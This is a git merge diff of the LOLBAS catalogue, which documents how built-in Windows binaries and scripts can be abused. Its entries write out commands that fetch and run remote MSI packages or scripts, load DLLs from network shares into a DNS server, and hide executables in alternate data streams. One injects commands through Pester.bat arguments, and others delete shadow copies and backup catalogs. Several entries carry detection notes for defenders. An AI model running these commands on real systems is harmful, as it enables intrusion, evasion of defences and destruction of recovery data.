Merge branch 'master' into master
|
@ -3,9 +3,8 @@ Kd.exe Debugger
|
|||
Certreq.exe Exfiltrate data
|
||||
Dbghost.exe
|
||||
Robocopy.exe Needs examples
|
||||
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
||||
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
||||
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
||||
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
|
||||
wbadmin.exe wbadmin delete catalog -quiet
|
||||
psexec.exe Remote execution of code
|
||||
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
||||
|
@ -14,5 +13,6 @@ odbcad32.exe GUI DLL Loading
|
|||
WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
|
||||
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
|
||||
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
|
||||
|
||||
|
||||
https://twitter.com/Hexacorn/status/993498264497541120
|
||||
https://twitter.com/Hexacorn/status/994000792628719618
|
||||
https://github.com/MoooKitty/Code-Execution
|
||||
|
|
13
LOLBins.md
|
@ -1,11 +1,13 @@
|
|||
# LOLBins - Living Off The Land Binaries
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
|
||||
|
||||
# OS BINARIES
|
||||
[Atbroker.exe](OSBinaries/Atbroker.md)
|
||||
[Appvlp.exe](OSBinaries/Appvlp.md)
|
||||
[Bash.exe](OSBinaries/Bash.md)
|
||||
[Bitsadmin.exe](OSBinaries/Bitsadmin.md)
|
||||
[Certutil.exe](OSBinaries/Certutil.md)
|
||||
[Cmdkey.exe](OSBinaries/Cmdkey.md)
|
||||
[Cmstp.exe](OSBinaries/Cmstp.md)
|
||||
|
@ -14,6 +16,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Cscript.exe](OSBinaries/Cscript.md)
|
||||
[Dfsvc.exe](OSBinaries/Dfsvc.md)
|
||||
[Diskshadow.exe](OSBinaries/Diskshadow.md)
|
||||
[Dnscmd.exe](OSBinaries/Dnscmd.md)
|
||||
[Esentutl.exe](OSBinaries/Esentutl.md)
|
||||
[Extexport.exe](OSBinaries/Extexport.md)
|
||||
[Extrac32.exe](OSBinaries/Extrac32.md)
|
||||
|
@ -44,11 +47,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Presentationhost.exe](OSBinaries/Presentationhost.md)
|
||||
[Print.exe](OSBinaries/Print.md)
|
||||
[Psr.exe](OSBinaries/Psr.md)
|
||||
[Qprocess.exe](OSBinaries/Qprocess.md)
|
||||
[Reg.exe](OSBinaries/Reg.md)
|
||||
[Regedit.exe](OSBinaries/Regedit.md)
|
||||
[Regasm.exe](OSBinaries/Regasm.md)
|
||||
[Regini.exe](OSBinaries/Regini.md)
|
||||
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
|
||||
[Regsvcs.exe](OSBinaries/Regsvcs.md)
|
||||
[Regsvr32.exe](OSBinaries/Regsvr32.md)
|
||||
[Replace.exe](OSBinaries/Replace.md)
|
||||
|
@ -60,6 +62,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Sc.exe](OSBinaries/Sc.md)
|
||||
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
|
||||
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
|
||||
[Wab.exe](OSBinaries/Wab.md)
|
||||
[Wmic.exe](OSBinaries/Wmic.md)
|
||||
[Wscript.exe](OSBinaries/Wscript.md)
|
||||
[Xwizard.exe](OSBinaries/Xwizard.md)
|
||||
|
@ -72,18 +75,20 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Cdb.exe](OtherMSBinaries/Cdb.md)
|
||||
[Csi.exe](OtherMSBinaries/Csi.md)
|
||||
[Dnx.exe](OtherMSBinaries/Dnx.md)
|
||||
[Dxcap.exe](OtherMSBinaries/Dxcap.md)
|
||||
[Mftrace.exe](OtherMSBinaries/Mftrace.md)
|
||||
[Msxsl.exe](OtherMSBinaries/Msxsl.md)
|
||||
[Rcsi.exe](OtherMSBinaries/Rcsi.md)
|
||||
[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)
|
||||
[Sqlps.exe](OtherMSBinaries/Sqlps.md)
|
||||
[SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.md)
|
||||
[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)
|
||||
[Te.exe](OtherMSBinaries/Te.md)
|
||||
[Tracker.exe](OtherMSBinaries/Tracker.md)
|
||||
[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)
|
||||
[Winword.exe](OtherMSBinaries/Winword.md)
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
|
||||
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# LOLLibs - Living Off The Land Libraries
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
|
||||
|
||||
# OS LIBRARIES
|
||||
[Advpack.dll](OSLibraries/Advpack.md)
|
||||
|
|
|
@ -1,14 +1,23 @@
|
|||
# LOLScripts - Living Off The Land Scripts
|
||||
Please contribute and do point out errors or resources I have forgotten.
|
||||
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
|
||||
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
|
||||
|
||||
# OS SCRIPTS
|
||||
|
||||
[Cl_invocation.ps1](OSScrits/Cl_invocation.md)
|
||||
[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)
|
||||
[Manage-bde.vbs](OSScripts/Manage-bde.md)
|
||||
[pester.bat](OSScripts/pester.md)
|
||||
[Pubprn.vbs](OSScripts/Pubprn.md)
|
||||
[Slmgr.vbs](OSScripts/Slmgr.md)
|
||||
[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)
|
||||
[Winrm.vbs](OSScripts/Winrm.md)
|
||||
|
||||
|
||||
|
||||
# OTHER MICROSOFT SIGNED SCRIPTS
|
||||
|
||||
|
||||
|
||||
# OTHER NON MICROSOFT BINARIES
|
||||
[Testxlst.js](OtherScripts/Testxlst.md)
|
After Width: | Height: | Size: 269 KiB |
After Width: | Height: | Size: 65 KiB |
After Width: | Height: | Size: 53 KiB |
After Width: | Height: | Size: 247 KiB |
After Width: | Height: | Size: 55 KiB |
After Width: | Height: | Size: 45 KiB |
After Width: | Height: | Size: 21 KiB |
After Width: | Height: | Size: 47 KiB |
After Width: | Height: | Size: 29 KiB |
|
@ -0,0 +1,35 @@
|
|||
## Appvlp.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
AppVLP.exe \\webdav\calc.bat
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Will - @moo_hax
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
* https://twitter.com/moo_hax/status/892388990686347264
|
||||
|
||||
Full path:
|
||||
```
|
||||
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe"
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used by App-V
|
||||
|
||||
|
||||
Detection:
|
||||
Appvlp.exe spawning other process
|
||||
|
||||
|
|
@ -0,0 +1,47 @@
|
|||
## Bitsadmin.exe
|
||||
|
||||
* Functions: Execute, Download, Copy, Read ADS
|
||||
|
||||
```
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
|
||||
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
|
||||
|
||||
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
|
||||
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Rob Fuller - @mubix
|
||||
* Chris Gates - @carnal0wnage
|
||||
* Oddvar Moe - @oddvarmoe
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
|
||||
* https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\bitsadmin.exe
|
||||
c:\windows\sysWOW64\bitsadmin.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
@ -0,0 +1,37 @@
|
|||
## Dnscmd.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Shay Ber - ?
|
||||
* Dimitrios Slamaris - @dim0x69
|
||||
* Nikhil SamratAshok Mittal - @nikhil_mitt
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
||||
* https://twitter.com/Hexacorn/status/994000792628719618
|
||||
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\Dnscmd.exe
|
||||
c:\windows\sysWOW64\Dnscmd.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Used on Windows servers for DNS management
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
||||
|
|
@ -1,15 +1,18 @@
|
|||
## Extrac32.exe
|
||||
|
||||
* Functions: Add ADS
|
||||
* Functions: Add ADS, Download
|
||||
|
||||
```
|
||||
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
|
||||
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
|
||||
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Oddvar Moe - @oddvarmoe
|
||||
* egre55 - @egre55
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
@ -17,6 +20,7 @@ Code sample:
|
|||
Resources:
|
||||
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
* https://twitter.com/egre55/status/985994639202283520
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
@ -1,11 +1,15 @@
|
|||
## hh.exe
|
||||
|
||||
* Functions: Open Explorer
|
||||
* Functions: Download, Execute
|
||||
|
||||
```
|
||||
HH.exe http://www.google.com
|
||||
|
||||
HH.exe C:\
|
||||
|
||||
HH.exe c:\windows\system32\calc.exe
|
||||
|
||||
HH.exe http://some.url/script.ps1
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
|
|
|
@ -4,17 +4,24 @@
|
|||
|
||||
```
|
||||
msiexec /quiet /i cmd.msi
|
||||
|
||||
msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||
|
||||
msiexec /y "C:\folder\evil.dll"
|
||||
|
||||
msiexec /z "C:\folder\evil.dll"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* ? - @netbiosX
|
||||
* PhilipTsukerman - @PhilipTsukerman
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
@ -1,31 +0,0 @@
|
|||
## Qprocess.exe
|
||||
|
||||
* Functions: Credentials
|
||||
|
||||
```
|
||||
qprocess /SERVER:RemoteServer
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Rahmat Nurfauzi - @infosecn1nja
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/infosecn1nja/status/987268926139592706
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\Qprocess.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Some specific details about the binary file.
|
||||
|
||||
|
||||
Detection:
|
||||
Details about detection.
|
||||
IOC, Behaviour , User Agents etc
|
||||
|
||||
|
|
@ -1,30 +0,0 @@
|
|||
## Regini.exe
|
||||
|
||||
* Functions: Credentials
|
||||
|
||||
```
|
||||
regini -m \\RemoteServer Example
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Osanda Malith - @OsandaMalith
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/OsandaMalith/status/987823644402372608
|
||||
* https://ss64.com/nt/regini.html
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\regini.exe
|
||||
c:\windows\sysWOW64\regini.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Can also be used to add registry keys
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
## Register-cimprovider.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Register-cimprovider -path "C:\folder\evil.dll"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* PhilipTsukerman - @PhilipTsukerman
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\Register-cimprovider.exe
|
||||
c:\windows\sysWOW64\Register-cimprovider.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
|
@ -4,6 +4,8 @@
|
|||
|
||||
```
|
||||
Scriptrunner.exe -appvscript calc.exe
|
||||
|
||||
ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
|
@ -15,6 +17,7 @@ Code sample:
|
|||
Resources:
|
||||
* https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||
* https://twitter.com/NickTyrer/status/914234924655312896
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
|
||||
Full path:
|
||||
```
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
## Wab.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Wab.exe (requires registry changes)
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Adam - @Hexacorn
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||
* https://twitter.com/Hexacorn/status/991447379864932352
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Program Files\Windows Mail\wab.exe
|
||||
C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Searches for wab.dll. Can be manipulated with the following registry key:
|
||||
```
|
||||
HKLM\Software\Microsoft\WAB\DLLPath
|
||||
```
|
||||
|
||||
Binary is used to manage Windows contacts/wab files. (Legacy)
|
||||
|
||||
|
||||
Detection:
|
||||
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,107 @@
|
|||
## pester.bat
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
# Execute notepad
|
||||
Pester.bat /help "$null; notepad"
|
||||
# Execute calc
|
||||
Pester.bat /help "$null; calc"
|
||||
# Execute Get-Process cmdlet
|
||||
Pester.bat /help "$null; ps"
|
||||
|
||||
# Other options for 2nd parameter
|
||||
pester.bat help "$null; notepad"
|
||||
pester.bat /help "$null; notepad"
|
||||
pester.bat ? "$null; notepad"
|
||||
pester.bat -? "$null; notepad"
|
||||
pester.bat /? "$null; notepad"
|
||||
|
||||
# 3rd parameter can be anything
|
||||
pester.bat /help "'doesnotexist'; notepad"
|
||||
pester.bat /help "Get-Help; notepad"
|
||||
pester.bat /help "gcm;notepad"
|
||||
|
||||
# 4th parameter is the payload
|
||||
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Emin Atac - @p0w3rsh3ll
|
||||
|
||||
Code sample:
|
||||
None
|
||||
|
||||
Resources:
|
||||
None
|
||||
|
||||
Full path:
|
||||
```powershell
|
||||
# Shipped inbox
|
||||
"c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
|
||||
|
||||
# There can be other versions present as well
|
||||
Dir "c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat"
|
||||
```
|
||||
|
||||
Notes: This file is digitally signed by a Microsoft certificate
|
||||
```powershell
|
||||
|
||||
Get-FileHash "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
|
||||
|
||||
|
||||
Algorithm Hash Path
|
||||
--------- ---- ----
|
||||
SHA256 EB83A9D837CFE2F409CA3839B017E307A7A65782CB6A0AE0C50731C244DAD40E C:\Program Files\WindowsPower...
|
||||
|
||||
|
||||
Get-AuthenticodeSignature "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" | fl
|
||||
|
||||
|
||||
SignerCertificate : [Subject]
|
||||
CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
|
||||
|
||||
[Issuer]
|
||||
CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington,
|
||||
C=US
|
||||
|
||||
[Serial Number]
|
||||
33000001733031072665B8B9B3000000000173
|
||||
|
||||
[Not Before]
|
||||
11/08/2017 22:23:35
|
||||
|
||||
[Not After]
|
||||
11/08/2018 22:23:35
|
||||
|
||||
[Thumbprint]
|
||||
14590DC5C3AAF238FCFD7785B4B93F4071402C34
|
||||
|
||||
TimeStamperCertificate : [Subject]
|
||||
CN=Microsoft Time-Stamp Service, OU=nCipher DSE ESN:12E7-3064-6112, OU=AOC, O=Microsoft
|
||||
Corporation, L=Redmond, S=Washington, C=US
|
||||
|
||||
[Issuer]
|
||||
CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
|
||||
|
||||
[Serial Number]
|
||||
33000000AC8A21BC7AD29B72F40000000000AC
|
||||
|
||||
[Not Before]
|
||||
07/09/2016 19:56:54
|
||||
|
||||
[Not After]
|
||||
07/09/2018 19:56:54
|
||||
|
||||
[Thumbprint]
|
||||
3970258B14C879DD5F0C5DE98B9CB39499F71CB7
|
||||
|
||||
Status : Valid
|
||||
StatusMessage : Signature verified.
|
||||
Path : C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
|
||||
SignatureType : Catalog
|
||||
IsOSBinary : True
|
||||
```
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,31 @@
|
|||
## Dxcap.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Dxcap.exe -c C:\Windows\System32\notepad.exe
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Matt harr0ey - @harr0ey
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/harr0ey/status/992008180904419328
|
||||
|
||||
Full path:
|
||||
```
|
||||
?
|
||||
```
|
||||
|
||||
Notes:
|
||||
This file is a part of Visual studio.
|
||||
https://msdn.microsoft.com/en-us/library/dn774939.aspx
|
||||
|
||||
|
||||
Detection:
|
||||
|
||||
|
||||
|
|
@ -22,10 +22,12 @@ Resources:
|
|||
Full path:
|
||||
```
|
||||
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||
|
||||
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
Part of SQL server, but also Office in some versions.
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
## testxlst.js
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
|
||||
wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Jimmy - @bohops
|
||||
|
||||
Code sample:
|
||||
*
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/bohops/status/993314069116485632
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\python27amd64\Lib\site-packages\win32com\test
|
||||
```
|
||||
|
||||
Notes:
|
||||
Part of Pywin32
|
||||
https://github.com/mhammond/pywin32
|
||||
|
||||
Detection:
|
||||
|
||||
|
||||
|
73
README.md
|
@ -1,16 +1,81 @@
|
|||
# Living Off The Land Binaries and Scripts
|
||||
# Living Off The Land Binaries and Scripts (and now also Libraries)
|
||||
|
||||
There are three different lists.
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">
|
||||
|
||||
|
||||
There are currently three different lists.
|
||||
|
||||
* [LOLBins](LOLBins.md)
|
||||
* [LOLLibs](LOLLibs.md)
|
||||
* [LOLScripts](LOLScripts.md)
|
||||
|
||||
|
||||
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
|
||||
Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
|
||||
The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques.
|
||||
|
||||
Definition of LOLBAS candidates (Binaries,scripts and libraries):
|
||||
* LOLBAS candidates must be present on the system by default or introduced by application/software "installation" from a "reputable" vendor or open-source entity. Otherwise, LOLBAS determination is subject to scrutiny by the (security) community and agreed upon standards.
|
||||
* Can be used as an attacker tool directly or can perform other actions than what it was intended to do (Ex: regsvr32 - execute code from SCT online)
|
||||
* executing code
|
||||
* downloading/upload files
|
||||
* bypass UAC
|
||||
* compile code
|
||||
* getting creds/dumping process
|
||||
* surveillance (keylogger, network trace)
|
||||
* evade logging/remove log entry
|
||||
* side-loading/hijacking of DLL
|
||||
* pass-through execution of other programs, script (via a LOLBin)
|
||||
* pass-through persistence utilizing existing LOLBin
|
||||
* persistence (Hide data in ADS, execute at logon etc)
|
||||
|
||||
Right now it is me that decides if the files are a valid contribution or not.
|
||||
I try my best to conclude with help from others in the InfoSec community and I do not wish to exclude anything.
|
||||
Also, please be patient if it takes some time for your contribution to be added to the list. I am just one guy.
|
||||
|
||||
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
|
||||
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
|
||||
Would really love if the community could contribute as much as possible. That would make it better for everyone.
|
||||
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
|
||||
|
||||
|
||||
## STORY
|
||||
"Living off the land" was coined by Matt Graeber - @mattifestation <3
|
||||
One of the first "Living Off The Land" talks (That I know of) is this one:
|
||||
https://www.youtube.com/watch?v=j-r6UonEkUw
|
||||
|
||||
The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
|
||||
https://twitter.com/MathCasualty/status/969174982579273728
|
||||
|
||||
The term LOLScripts came from Jimmy - @bohops:
|
||||
https://twitter.com/bohops/status/984828803120881665
|
||||
|
||||
Common hashtags for these files are:
|
||||
|
||||
#LOLBin
|
||||
#LOLBins
|
||||
#LOLScript
|
||||
#LOLScripts
|
||||
#LOLLib
|
||||
#LOLLibs
|
||||
|
||||
A "highly scientific poll" was also conducted to agree (69% yes) on the name LOLBins.
|
||||
https://twitter.com/Oddvarmoe/status/985432848961343488
|
||||
|
||||
The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
|
||||
|
||||
The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man!
|
||||
|
||||
Love this logo:
|
||||
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOL1.png" height="250">
|
||||
|
||||
## Future work / Todo list
|
||||
- [ ] Better classification system
|
||||
- [ ] Load DLL
|
||||
- [ ] Arbitrary unsigned code execution
|
||||
- [ ] Launch other process
|
||||
- [ ] Better contribution template
|
||||
- [ ] Provide the project in DB format (sqlite)
|
||||
- [ ] Re-factor project (version 2.0) and move it to a dedicated project site (https://github.com/LOLBAS-Project)
|
||||
- [ ] Map it to the Mitre Att&ck <3
|
||||
- [ ] LOLGuiBins
|
||||
- [ ] More list based on classifications
|
||||
- [ ] LOLBAS lists for Linux? OSX?
|